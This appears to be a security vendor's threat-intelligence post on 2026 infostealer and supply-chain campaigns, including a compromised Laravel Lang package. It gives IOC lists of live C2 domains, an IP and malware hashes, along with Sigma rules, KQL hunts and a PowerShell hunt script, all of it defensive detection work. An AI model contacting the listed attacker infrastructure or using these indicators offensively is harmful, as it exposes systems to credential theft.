Back to Intelligence

TwizAdmin, JINX-0164, & Laravel Compromise: Multi-Vector Credential Theft & Supply Chain Analysis

SA
Security Arsenal Team
May 28, 2026
6 min read

Threat Summary

Analysis of the latest OTX pulses indicates a coordinated surge in credential theft and infostealer operations targeting the cryptocurrency sector, software developers, and major event attendees. Threat actors are leveraging diverse attack vectors including supply chain compromises (Laravel Lang), social engineering (JINX-0164), and phishing-as-a-service (GHOST STADIUM).

The campaigns are primarily financially motivated, focusing on stealing cryptocurrency wallet seed phrases (TwizAdmin), browser credentials (Vidar, Lumma), and developer session tokens (AUDIOFIX). Notably, adversaries are evolving C2 infrastructure, utilizing blockchain smart contracts (ClearFake) and FastAPI panels to evade takedowns and manage multi-stage malware operations.

Threat Actor / Malware Profile

DataBreachPlus (TwizAdmin & crpx0)

  • Distribution: Malvertisements and phishing campaigns impersonating FedEx.
  • Payload Behavior: Multi-stage operation featuring a cryptocurrency clipper supporting 8 chains, BIP-39 seed phrase theft, and browser credential exfiltration.
  • C2 Communication: Managed via a FastAPI-based panel located at exposed IP 103.241.66[.]238.
  • Persistence: Utilizes a ransomware module (crpx0) and a Java RAT builder with a license key system for persistence on Windows and macOS.

JINX-0164 (AUDIOFIX & MINIRAT)

  • Distribution: LinkedIn social engineering targeting crypto industry professionals, posing as recruiters. Also utilizes supply chain attacks via malicious npm packages.
  • Payload Behavior: Delivers AUDIOFIX (Python-based infostealer/RAT) and MINIRAT (Go backdoor) tailored for macOS.
  • C2 Communication: Uses typosquatted domains like login.teamicrosoft.com and live.ong to blend in with legitimate traffic.

GHOST STADIUM

  • Distribution: Facebook advertising exploitation and over 4,300 fraudulent domains impersonating FIFA 2026 infrastructure.
  • Payload Behavior: Deploys Vidar and Lumma stealers to harvest credentials and financial data from victims seeking World Cup tickets.
  • C2 Communication: Operates a Phishing-as-a-Service ecosystem with pixel-perfect clones of authentication systems.

ClearFake / SectopRAT

  • Distribution: Compromised Swiss websites injected with malicious JavaScript.
  • Payload Behavior: Uses "EtherHiding" to store C2 instructions inside smart contracts on the BNB Smart Chain testnet, delivering SectopRAT and ACRStealer.
  • Anti-Analysis: Immutable C2 infrastructure hosted on blockchain makes takedowns nearly impossible.

Laravel Lang Supply Chain

  • Distribution: Compromised community-maintained packages (laravel-lang/lang, etc.) on package repositories.
  • Payload Behavior: Remote Code Execution (RCE) backdoor allowing deployment of helpers.php stealer and DebugChromium.exe.
  • C2 Communication: Exfiltration to flipboxstudio.info.

IOC Analysis

The provided indicators encompass a wide range of infrastructure:

  • Domains & URLs: High volume of suspicious domains (e.g., fanonlyatn.xyz, fifa.gold, flipboxstudio.info) used for C2 communication and payload delivery. SOC teams should immediately block these at the proxy and DNS layer.
  • File Hashes (SHA256): Multiple hashes associated with TwizAdmin, JINX-0164, and the Laravel backdoor. These should be added to EDR blocklists and used to scan user directories and temp folders.
  • Hostnames & Typosquatting: Indicators like login.teamicrosoft.com suggest sophisticated social engineering aiming to bypass email filters via lookalike domains.
  • Operationalization: Tools like Splunk, QRadar, or Microsoft Sentinel can ingest these STIX objects. Automated playbooks should trigger isolation upon detection of connections to flipboxstudio.info or execution of the listed SHA256 hashes.

Detection Engineering

Sigma Rules

YAML
title: Potential TwizAdmin C2 Communication
id: 2b3c4d5e-6f7a-8b9c-0d1e-2f3a4b5c6d7e
description: Detects network connections to known TwizAdmin C2 infrastructure fanonlyatn.xyz.
status: experimental
date: 2026/05/28
author: Security Arsenal
logsource:
    category: network_connection
product: windows
detection:
    selection:
        Initiated: 'true'
        DestinationHostname|contains: 'fanonlyatn.xyz'
    condition: selection
falsepositives:
    - Unknown
level: critical
tags:
    - attack.c2
    - attack.command_and_control
    - malware.twizadmin

---

title: Laravel Lang Compromise C2 Activity
id: 1a2b3c4d-5e6f-7a8b-9c0d-1e2f3a4b5c6d
description: Detects connections to flipboxstudio.info associated with the Laravel Lang RCE backdoor.
status: experimental
date: 2026/05/28
author: Security Arsenal
logsource:
    category: network_connection
product: windows
detection:
    selection:
        DestinationHostname|contains: 'flipboxstudio.info'
    condition: selection
falsepositives:
    - Unknown
level: critical
tags:
    - attack.initial_access
    - attack.software_supply_chain
    - cve.2026.laravel

---

title: ClearFake Smart Contract C2 Domain Access
id: 9f8e7d6c-5b4a-3f2e-1d0c-9b8a7f6e5d4c
description: Detects connections to domains associated with ClearFake blockchain C2 infrastructure.
status: experimental
date: 2026/05/28
author: Security Arsenal
logsource:
    category: network_connection
product: windows
detection:
    selection:
        DestinationHostname|endswith:
            - '.veloitall.cfd'
            - '.xamir3on.lat'
            - '.srv-auth-dlt-msh.in.net'
    condition: selection
falsepositives:
    - Unknown
level: high
tags:
    - attack.defense_evasion
    - attack.command_and_control
    - malware.clearfake

KQL (Microsoft Sentinel)

KQL — Microsoft Sentinel / Defender
// Hunt for connections to TwizAdmin, JINX-0164, and Laravel C2 infrastructure
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteUrl has_any ("fanonlyatn.xyz", "flipboxstudio.info", "live.ong", "driver-updater.net", "login.teamicrosoft.com") 
       or RemoteUrl contains "fifa."
| project Timestamp, DeviceName, InitiatingProcessAccountName, RemoteUrl, RemoteIP

// Hunt for execution of known malicious hashes from pulses
DeviceProcessEvents
| where Timestamp > ago(7d)
| where SHA256 in ("06299676b43749b8477c4bc977c09512957fc9b66fd5030c1874069632ce6092", "3fcd267e811d9b83cafa3d8d6932fa1c56f4fd8dcf46f9ec346e0689439532d4", "584796212f99efc7ac765d6048913fe34e46a64b13a8a78fb3a465b8c61f3527", "b6cab0b3aa8e56e2427f486c74588d598ae58bb0cbc0eda6939fe171cb0aed17")
| project Timestamp, DeviceName, FolderPath, SHA256, InitiatingProcessAccountName

PowerShell Hunt Script

PowerShell
<#
.SYNOPSIS
    IOC Hunt for TwizAdmin, Laravel Backdoor, and JINX-0164 Indicators.
.DESCRIPTION
    Scans the hosts file for malicious entries and checks for running processes matching known SHA256 hashes.
#>

$MaliciousDomains = @(
    "fanonlyatn.xyz",
    "flipboxstudio.info",
    "live.ong",
    "driver-updater.net",
    "login.teamicrosoft.com",
    "teams.live.us.org",
    "afraid.veloitall.cfd"
)

$MaliciousHashes = @(
    "06299676b43749b8477c4bc977c09512957fc9b66fd5030c1874069632ce6092",
    "3fcd267e811d9b83cafa3d8d6932fa1c56f4fd8dcf46f9ec346e0689439532d4",
    "584796212f99efc7ac765d6048913fe34e46a64b13a8a78fb3a465b8c61f3527",
    "b6cab0b3aa8e56e2427f486c74588d598ae58bb0cbc0eda6939fe171cb0aed17"
)

# 1. Check Hosts File for malicious domains
Write-Host "Checking Hosts file for malicious domain entries..."
$HostsPath = "$env:SystemRoot\System32\drivers\etc\hosts"
if (Test-Path $HostsPath) {
    $HostsContent = Get-Content $HostsPath
    foreach ($Domain in $MaliciousDomains) {
        if ($HostsContent -match $Domain) {
            Write-Host "[ALERT] Malicious domain found in hosts file: $Domain" -ForegroundColor Red
        }
    }
}

# 2. Scan running processes for known IOCs
Write-Host "Scanning running processes for known malicious hashes..."
$Processes = Get-Process -IncludeUserName
foreach ($Proc in $Processes) {
    try {
        $FilePath = $Proc.Path
        if ($FilePath -and (Test-Path $FilePath)) {
            $FileHash = Get-FileHash -Path $FilePath -Algorithm SHA256 -ErrorAction SilentlyContinue
            if ($FileHash.Hash -in $MaliciousHashes) {
                Write-Host "[ALERT] Malicious process detected: $($Proc.ProcessName) (PID: $($Proc.Id))" -ForegroundColor Red
                Write-Host "Path: $FilePath" -ForegroundColor Red
            }
        }
    } catch {
        # Ignore access denied errors for system processes
        continue
    }
}

Write-Host "Hunt complete."

Response Priorities

  • Immediate:

    • Block all listed domains and IPs at the network perimeter and proxy level.
    • Scan all endpoints for the specific SHA256 hashes provided in the IOC lists.
    • Investigate any recent Laravel project updates or composer operations for signs of the helpers.php backdoor.

  • 24h:

    • If credential-stealing malware (TwizAdmin, Vidar, Lumma) is detected, force a password reset for all user accounts and revoke session tokens, especially for developers and finance teams.
    • Audit LinkedIn messages received by development staff for JINX-0164 recruitment lures.

  • 1 Week:

    • Implement Software Composition Analysis (SCA) checks to detect compromised Laravel Lang versions immediately.
    • Update browser isolation policies to mitigate drive-by downloads from ClearFake campaigns.
    • Conduct security awareness training focused on crypto-clipping and high-profile event phishing (FIFA World Cup).

Related Resources

Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub

darkwebotx-pulsedarkweb-credentialsinfostealersupply-chain-attacktwizadminjinx-0164laravel-backdoor

Is your security operations ready?

Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.

Book a SOC AssessmentSee AlertMonitor in Action